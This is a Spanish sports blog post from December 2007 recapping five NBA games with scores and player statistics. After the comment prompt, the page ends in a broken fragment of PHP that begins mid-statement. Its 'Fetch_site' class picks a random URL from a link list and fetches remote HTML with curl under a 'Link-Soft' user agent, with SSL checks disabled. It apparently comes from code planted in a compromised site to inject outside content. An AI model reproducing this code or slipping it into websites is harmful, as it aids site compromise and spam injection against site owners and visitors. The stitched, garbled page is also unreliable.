La crónica (10/12/07)

11 de December de 2007 por MagicJohnson32

Algunas sorpresas nos ha deparado la madrugada del día 10 en la NBA, especialmente la victoria de los Hawks en Orlando pero también la de los Heat en Phoenix. Los Rockets perdieron algo más que su partido ante los Sixers y siguen ofreciendo una muy mala imagen; los Kings sobreviven sin Bibby ni Kevin Martin y anoche vencieron a unos Bucks que siguen en caída libre; y Nowitzki hundió un poco más a los Knicks, que ven como sus aficionados ya no sólo abuchean a Isiah Thomas.

 

 Vamos con la crónica de los partidos disputados anoche:

Rockets 88 – 100 Sixerstmacsixers

Las malas noticias nunca vienen solas. Las buenas, tampoco. Houston salió anoche del Wachovia Center de Philadelphia con la undécima derrota de la temporada y sin McGrady, que hubo de dejar el partido tras torcerse el tobillo durante la segunda mitad, cuando los Rockets ya caían estrepitosamene (46-74) ante los emergentes Sixers. Para éstos, el de anoche supone su tercer triunfo consecutivo, y mañana pueden ampliar la racha ante los T’Wolves, que, pese a sorprender recientemente a los Suns, siguen como el peor equipo de la NBA. Por lo que hace a las estadísticas, pocas veces veremos un quinteto inicial tan escasamente productivo como el de los Rockets de anoche: 28 puntos y 6 asistencias en total sumaron Francis, McGrady, Battier, Hayes y Yao. La mejor aportación para los texanos llegó por parte de Bonzi Wells, autor de 24 puntos y 10 rebotes, y de Luther Head, con 18. En los locales destacaron Andre Miller, que anotó 18 puntos y repartió 12 asistencias, y sobre todo Willie Green, con 20 puntos, 6 rebotes y 4 asistencias.

Hawks 98 – 87 Magic

Lo de Atlanta va en serio, o al menos ésa es la sensación que queda tras su victoria lograda anoche en pista de los Orlando Magic, uno de los mejores conjuntos de la actual temporada, y que sitúa a los Hawks al 50% de victorias (10-10). Es, además, el tercer hawksatorlandotriunfo consecutivo para este joven equipo liderado nuevamente por Josh Smith, que firmó 25 puntos, 16 rebotes, 5 asistencias, 4 robos y 4 tapones. Los del estado de Georgia tomaron el mando del partido propulsados por el gran inicio de Joe Johnson, autor de 11 puntos en el primer cuarto, cuando los Hawks lograron un parcial de 29-19. Y ya no dejaron escapar su ventaja en todo el partido. Joe Johnson acabó con 24 puntos, 4 rebotes y 4 asistencias, Anthony Johnson añadió 15-6-5 y Shelden Williams sumó 12 puntos y 7 rebotes saliendo desde el banquillo. Lo que le valió el triunfo a los Hawks fue, sin embargo, su gran defensa: dejaron a los Magic en 87 puntos con menos de un 40% en tiros de campo, 11 de 31 en triples, a la vez que desactivaron a Dwight Howard, que pese a atrapar 18 rebotes, se quedó en 14 puntos con sólo 4 de 7 en tiros de campo y un 6 de 14 en tiros libres. Turkoglu, con 22-7-5, fue el mejor de los visitantes, y Rashard Lewis añadió 15 puntos y 7 rebotes.

Mavs 99 – 89 Knicks

Hace falta poca cosa para ganar a los actuales Knicks; y Dirk Nowitzki no es poca cosa. Los Mavericks vencieron en el Madison liderados por el alemán, que completó su mejor actuación ofensiva de la temporada con 36 puntos para desarmar a unos Knicks cuya situación resulta patética. Los abucheos del público hacia Isiah Thomas se empiezan a extender a los jugadores y ayer Eddie Curry fue el objetivo principal de las críticas. Apenas cuando los Knicks parecieron en disposición de culminar una gran remontada, tras reducir a siete puntos una diferencia que había superado la veintena, los fans apoyaron a su equipo. El resto del tiempo mostraron claramente su malestar, tanto que Thomas discutió con varios aficionados y Randolph reconoció que no entendía la situación y que resulta muy duro jugar así. En realidad, lo que resulta duro es ver jugar a este equipo, que apenas fue capaz de ofrecer resistencia a unos Mavs que vivieron de Nowitzki (36-7-4), Josh Howard (22-6-4) y la aportación desde el banquillo de Stackhouse con 13 puntos. De los locales destacó Zach Randolph, autor de 24 puntos, todos tras el descanso. Curry no fue capaz de sobreponerse a los abucheos e hizo 3 de 13 en tiros para 6 puntos y 3 rebotes.

Heat 117 – 113 Sunsrileyatsuns

Los Heat empiezan a parecerse al equipo que todos esperábamos. No son la mejor plantilla, ni mucho menos, pero sí un grupo competitivo y capaz de obtener victorias como la de anoche en pista de los Suns. De nuevo con Wade (31 puntos y 6 asistencias) como estilete, los de Florida lograron por primera vez esta temporada dos victorias consecutivas, ambas en canchas de equipos del Oeste y que sirven para cerrar con motivos para el optimismo una gira que se había iniciado con derrotas en Denver, Utah, Portland y Oakland. Tras superar a los Clippers, anoche hicieron lo propio ante unos Suns incapaces de frenar a Wade, quien además contó con una gran actuación de Haslem, con 21 puntos y 12 rebotes, y la contribución de O’Neal (18 y 11) y Wright (16 y 12). Entre estos tres jugadores cogieron seis rebotes más que todos los Suns, factor desequilibrante junto a la diferencia en el acierto en los tiros (59% de los visitantes por 48.5% de los locales). Por el equipo de Arizona, cuatro jugadores lograron 19 puntos, Bell, Marion, Hill y Stoudemire, y otros tres, Nash, Barbosa y Skinner, lograron más de 10.

Bucks 93 – 96 Kings

Los de Milwaukee perdieron ante unos Kings sin Kevin Martin ni Mike Bibby, en la que supone su octava derrota en los últimos 9 partidos. Entraron en el último cuarto ganando por 8 y se dejaron remontar por unos Kings más intensos. Muestra de ellos son ocho tapones (sólo uno de un hombre interior) que colocaron los locales, por sólo uno de los visitantes. Los Kings se valieron del acierto de Salmons desde el perimetro, 22 puntos y 5 asistencias con un 9 de 14 en tiros de campo incluido un impecable 3 de 3 en triples, y de Brad Miller en la pintura, que acabó con 17-10 y 7 de 10 en tiros de campo, bien secundados por Udrih 14-6-3, y Ron Artest, que pese a dar una nueva muestra de cómo no se debe tirar a canasta, aportó 11 puntos, 7 rebotes, 5 asistencias y 4 tapones; desde el banco Garcia sumó 15-4-3 y 3 robos de balón. En los Bucks sólo Redd alcanzó los 15 puntos y se fue hasta 24, aunque con escaso acierto en el tiro (8 de 19). Mo Williams y Andrew Bogut sumaron 26 puntos, 11 rebotes y 13 asistencias con 11 de 27 en sus tiros, y en el banquillo Villanueva hizo 11 puntos y 7 rebotes en 22 minutos, dando cierta muestra de mejora. Un partido gris para dos equipos, hasta el momento, grises.

 

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>